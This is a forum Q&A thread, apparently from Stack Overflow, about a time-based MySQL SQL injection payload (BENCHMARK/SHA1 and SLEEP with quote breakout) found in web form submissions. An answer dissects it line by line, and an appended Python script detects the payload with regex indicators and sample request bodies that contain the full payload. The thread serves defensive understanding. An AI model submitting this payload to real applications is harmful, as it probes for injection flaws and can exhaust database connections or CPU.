Reputation: 303
Someone injects the following content by using text fields in forms:
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR"*/
Do you have any idea what it does? To me, it looks like an attempt to slow things down.
You can find a lot of injected websites (using this code) on Google. I reckon there is some "super hacker script" that is used for that. It seems to use "[email protected]" as the default email address. Does somebody know that script?
Upvotes: 2
Views: 5301
Reputation: 23493
It's designed to hit the CPU hard regardless of whether the input box's value is unquoted, single-quoted, or double-quoted on older versions of MySQL, and on newer versions, to sleep for 5 seconds, holding the connection open.
In each case it's likely to perform a denial-of-service attack if the application is vulnerable to SQL injection, because holding a connection open for a long time is likely to result in the server running out of resources/available connections.
-- If it's unquoted, it sees this:
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))
-- ...and then ignores the rest, which appears commented:
/*
-- If it's single-quoted, it doesn't see the comment;
-- rather, it terminates the single quote:
'
-- ...and then sees this:
XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR
-- ...and then sees the next part as a single-quoted string terminated in the client
'|
-- But if it's a double-quoted string, it sees the end double quote:
"
-- ...and runs this:
XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR
-- ...and then opens a double quote to be closed in the client
"
-- This is the end of the comment opened in the case of the unquoted client string.
*/
In each case it's attempting to benchmark an execution of the SHA1 function, which is quite CPU-intensive. BENCHMARK is simply a function that executes another expression a fixed number of times. In this case it's used to perform a CPU DoS on the host.
Upvotes: 4
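A defensive check for the payload discussed in the answer above, as an added example that is not part of the original posts: it scans URL-encoded form bodies for the delay functions, the version probe, the quote breakout and the comment markers that the answer walks through. The function names, the indicator set and the sample request bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, quote_plus, unquote_plus, urlencode

# Heuristic markers for the payload family in the question (assumed rule set).
INDICATORS = {
    "delay_function": re.compile(r"\b(?:benchmark|sleep)\s*\(", re.I),
    "version_probe": re.compile(r"@@version", re.I),
    "quote_breakout": re.compile(r"""['"]\s*(?:x?or|and)\b""", re.I),
    "block_comment": re.compile(r"/\*|\*/"),
}

def decode_fully(value, max_rounds=3):
    """Undo repeated URL-encoding so double-encoded input is still inspected."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_form_body(body):
    """Map each suspicious form field to the sorted indicator names it matched."""
    findings = {}
    for field, raw in parse_qsl(body, keep_blank_values=True):
        text = decode_fully(raw)
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
        # Only a delay function makes a field reportable; the rest is context.
        if "delay_function" in hits:
            findings[field] = hits
    return findings

# Constructed sample inputs. CORE and PAGE_PAYLOAD rebuild the string quoted in the question.
CORE = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))"
PAGE_PAYLOAD = f"{CORE}/*'XOR({CORE})OR'|\"XOR({CORE})OR\"*/"
BODY_PAYLOAD = urlencode({"name": "Alice", "comment": PAGE_PAYLOAD})
BODY_DOUBLE_ENCODED = "q=" + quote_plus(quote_plus(CORE))
BODY_BENIGN = urlencode({"comment": "We benchmark nightly and sleep on the results"})

if __name__ == "__main__":
    for body in (BODY_PAYLOAD, BODY_DOUBLE_ENCODED, BODY_BENIGN):
        print(scan_form_body(body))
```

A match here is a signal for log review or alerting; the underlying flaw is removed by binding form input as query parameters instead of concatenating it into SQL.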